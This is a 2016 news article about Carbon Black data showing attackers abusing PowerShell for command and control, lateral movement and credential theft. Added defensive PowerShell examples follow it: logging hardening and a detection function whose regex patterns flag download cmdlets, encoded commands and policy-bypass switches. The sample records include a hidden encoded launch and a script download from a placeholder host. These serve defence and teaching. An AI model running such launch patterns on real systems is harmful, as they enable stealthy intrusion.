Endpoint
4/15/2016 03:14 PM

PowerShell Increasingly Being Used To Hide Malicious Activity

Data from 1,100 security investigations shows PowerShell was used in 38 percent of cyberattacks

Threat actors often try to take advantage of native tools in operating systems to conceal malicious activities.

One tool that appears to be a particular favorite in this regard is the PowerShell command shell and scripting language that Microsoft has included with its Windows operating system since 2009.

Security firm Carbon Black recently analyzed data from 1,100 investigations conducted by more than two dozen of its partners in 2015 to see how extensively PowerShell is being exploited in cyber attacks.

The data showed that in 38 percent of the investigated incidents, PowerShell was a part of the attack. Some 31 percent of the victim organizations said they had no idea that PowerShell had been exploited and discovered that fact only after calling in someone to investigate security incidents.

The most common malicious activity carried out via PowerShell was command and control communications. The data also showed that threat actors, trying to move laterally across a network after breaking into it first, often used PowerShell to conceal their movement. Credential theft and privilege escalation were some of the other common malicious activities enabled via PowerShell.

More than 85 percent of the attacks leveraging PowerShell were what Carbon Black described as commodity attacks such as click fraud, ransomware, fake antivirus and other opportunistic threats. Many of these attacks appeared focused on stealing customer and financial data, and intellectual property, or on disrupting services. About 13 percent of the attacks appeared targeted, according to Carbon Black.

PowerShell is commonly used to automate repetitive tasks and for system administration purposes. Administrators for instance often use it to access remote systems in order to query them and for executing commands on them.

What makes it an appealing target for compromise is the opportunity it gives attackers to hide malicious activity, Carbon Black said in its report. PowerShell is a ubiquitous part of the Windows environment and is used more for legitimate purposes than not. Therefore it serves as a perfect foil for threat actors to hide their activities, the Carbon Black report noted.

“Its ability to dynamically load and execute code without touching the file system makes it especially difficult to secure,” the company warned.

As is common with many multi-stage attacks these days, PowerShell compromises usually begin via a separate initial compromise enabled through a phishing email or some other social engineering tactic. In a typical attack, a victim might receive a specially crafted Microsoft Office document as an email attachment or as a download via a link in the email. Opening the document usually results in the user being prompted to disable their macro security.

“Many enterprises make extensive use of macros in spreadsheets and Word documents,” says Rico Valdez, senior threat researcher at Carbon Black, in comments to Dark Reading. So a target might already be accustomed to disabling macro security to enable enhanced functionality in their docs, he said. “A well-crafted phish in which the target believes the document is coming from a trusted source might have the target believe the macros are legitimate.”

Enterprises need to be cognizant of the risks around PowerShell, Valdez says. What used to be considered a more sophisticated technique until relatively recently has entered the mainstream and is being used in all kinds of attacks, including commodity malware, he says. According to Carbon Black, the relatively easy availability of toolkits such as PowerSploit, PowerShell Empire, and p0wnedShell has also made it simple for threat actors to co-opt PowerShell in cyberattacks.

The trend heightens the need for organizations to set standards for PowerShell usage, for instance by allowing only signed scripts to execute.

Organizations should also consider capturing and monitoring PowerShell executions and storing the log data centrally so an attacker cannot tamper with it. Administrators can then set up alerts on key indicators in the log data, Valdez says. Blocking PowerShell altogether is another option, though that might not always be possible, he says.
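The two recommendations above, requiring signed scripts and capturing PowerShell executions into centrally stored logs, applied to a single Windows host. This is an added example and not code from the article or from Carbon Black; it is meant for an elevated Windows PowerShell 5.x session, and in a domain the same registry values would be pushed through Group Policy instead. The collector share name is an assumed placeholder.

```powershell
# Added example (not from the article or Carbon Black): local hardening of
# PowerShell on one host. Run elevated. The collector share is an assumption.

$Policy    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$Collector = '\\collector.example.internal\pstranscripts$'   # assumed placeholder, write-only share

# 1. Allow only signed scripts to run, machine-wide.
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force

# 2. Script block logging: the de-obfuscated text of every script block that
#    PowerShell compiles, written as event ID 4104 to the
#    Microsoft-Windows-PowerShell/Operational log. This is the record that
#    catches code loaded into memory without ever touching the file system.
New-Item -Path "$Policy\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "$Policy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 3. Module logging: pipeline execution details for every module (event ID 4103).
New-Item -Path "$Policy\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "$Policy\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
Set-ItemProperty -Path "$Policy\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String

# 4. Transcription straight to a share on the central collector, so that a
#    later compromise of this host cannot alter what was already recorded.
New-Item -Path "$Policy\Transcription" -Force | Out-Null
Set-ItemProperty -Path "$Policy\Transcription" -Name EnableTranscripting    -Value 1 -Type DWord
Set-ItemProperty -Path "$Policy\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
Set-ItemProperty -Path "$Policy\Transcription" -Name OutputDirectory -Value $Collector -Type String

# 5. Enlarge the Operational log (here 1 GiB) so 4104 events are not rotated
#    away before the event forwarder has shipped them.
wevtutil sl Microsoft-Windows-PowerShell/Operational /ms:1073741824

# 6. Verify what was applied.
Get-ExecutionPolicy -List
Get-ItemProperty -Path "$Policy\ScriptBlockLogging", "$Policy\ModuleLogging", "$Policy\Transcription"
```

Two points on the design. Microsoft documents the execution policy as a safety feature rather than a security boundary, so the AllSigned setting prevents accidental or careless execution of unsigned scripts but is not what stops a determined intruder; the logging in steps 2 through 4 is what gives an investigator the evidence. The transcript share should grant clients create and write access only, with no read, modify or delete, and the Operational log should be forwarded off-host (Windows Event Forwarding or a SIEM agent) for the same tamper-resistance reason the article gives.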

“Profile and understand how PowerShell is used in your environment, and watch for or block use that does not meet that profile,” Valdez says. “PowerShell pulling down scripts from the Internet, being invoked with specific parameters, or being launched by users or processes that are not typical in your environment can go a long way toward identifying and stopping these attacks.”
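A profile-based check built around the three indicators Valdez names: PowerShell pulling content from the Internet, being invoked with particular parameters, and being launched by users or processes that are not typical. This is an added example, not the article's or Carbon Black's code; the baseline lists, the sample launch records, the `placeholder.invalid` URL and the function names are all constructed for illustration and should be replaced with what profiling your own environment shows.

```powershell
# Added example (not from the article or Carbon Black): flag PowerShell
# launches that fall outside a stated profile. Baseline and samples are constructed.

# Baseline: what "typical" looks like in this (constructed) environment.
$ExpectedParents  = @('explorer.exe', 'services.exe', 'svchost.exe')
$ExpectedAccounts = @('CORP\svc-config', 'CORP\helpdesk-admin')

function Test-PowerShellLaunch {
    param(
        [AllowEmptyString()] [string] $CommandLine   = '',
        [AllowEmptyString()] [string] $ParentProcess = '',
        [Parameter(Mandatory)] [string] $Account
    )
    $reasons = [System.Collections.Generic.List[string]]::new()

    # Indicator 1: script content pulled from the network into the shell.
    if ($CommandLine -match 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer') {
        $reasons.Add('network download in command line')
    }
    # Indicator 2: parameters that hide the window, pass a base64 payload, or
    #              skip the profile and execution policy (-match is case-insensitive).
    if ($CommandLine -match '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}') { $reasons.Add('encoded command') }
    if ($CommandLine -match '-w(indowstyle)?\s+hidden')                        { $reasons.Add('hidden window') }
    if ($CommandLine -match '-nop\w*\b|-e[px]\w*\s+bypass')                     { $reasons.Add('profile or policy bypass switch') }
    # Indicator 3: launched by a process or account outside the profile, for
    #              example an Office application after the macro phish described above.
    $parent = [System.IO.Path]::GetFileName($ParentProcess).ToLowerInvariant()
    if ($parent -notin $ExpectedParents)   { $reasons.Add("unexpected parent process: $parent") }
    if ($Account -notin $ExpectedAccounts) { $reasons.Add("unexpected account: $Account") }

    [pscustomobject]@{
        Suspicious    = $reasons.Count -gt 0
        Reasons       = $reasons -join '; '
        Account       = $Account
        ParentProcess = $parent
        CommandLine   = $CommandLine
    }
}

# Constructed sample launch records, shaped like the fields of a Security 4688 event.
$Samples = @(
    @{ CommandLine = 'powershell.exe -File C:\Scripts\Get-DiskReport.ps1'
       ParentProcess = 'C:\Windows\System32\services.exe'; Account = 'CORP\svc-config' },
    @{ CommandLine = 'powershell.exe -nop -w hidden -enc ' + ('A' * 40)   # dummy base64, not a real payload
       ParentProcess = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'; Account = 'CORP\jdoe' },
    @{ CommandLine = 'powershell.exe -c "Invoke-WebRequest -Uri http://placeholder.invalid/tool.ps1 -OutFile C:\Users\Public\tool.ps1"'
       ParentProcess = 'C:\Windows\explorer.exe'; Account = 'CORP\jdoe' }
)
$Samples | ForEach-Object {
    Test-PowerShellLaunch -CommandLine $_.CommandLine -ParentProcess $_.ParentProcess -Account $_.Account
} | Where-Object Suspicious | Format-List Account, ParentProcess, Reasons
# Record 1 matches the profile; records 2 and 3 are reported with their reasons.

# The same check over live 4688 (process creation) events from the Security log.
# Needs process-creation auditing with command-line inclusion enabled;
# ParentProcessName is present on Windows 10 / Server 2016 and later.
function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord] $Event, [string] $Name)
    (([xml] $Event.ToXml()).Event.EventData.Data | Where-Object Name -eq $Name).'#text'
}
function Find-SuspiciousPowerShellLaunch {
    param([int] $MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents |
        Where-Object { (Get-EventField $_ 'NewProcessName') -match '\\(powershell(_ise)?|pwsh)\.exe$' } |
        ForEach-Object {
            $acct = '{0}\{1}' -f (Get-EventField $_ 'SubjectDomainName'), (Get-EventField $_ 'SubjectUserName')
            Test-PowerShellLaunch -CommandLine ([string](Get-EventField $_ 'CommandLine')) `
                                  -ParentProcess ([string](Get-EventField $_ 'ParentProcessName')) `
                                  -Account $acct
        } | Where-Object Suspicious
}
```

The value of this approach is the baseline, not the regular expressions: the same parent-process and account allow-lists applied to script block (4104) content will surface activity that never shows up on a command line, and any hit on an indicator is a prompt to investigate rather than a verdict, since administrators do legitimately download scripts and run encoded commands. Keep the allow-lists in version control and review every addition, because an attacker who can edit the profile can hide inside it.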


Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...

Comments
GeethaR978 (User Rank: Apprentice), 4/16/2016 3:26:07 AM
informative
Very informative. Helps to gain knowledge about new information and concepts.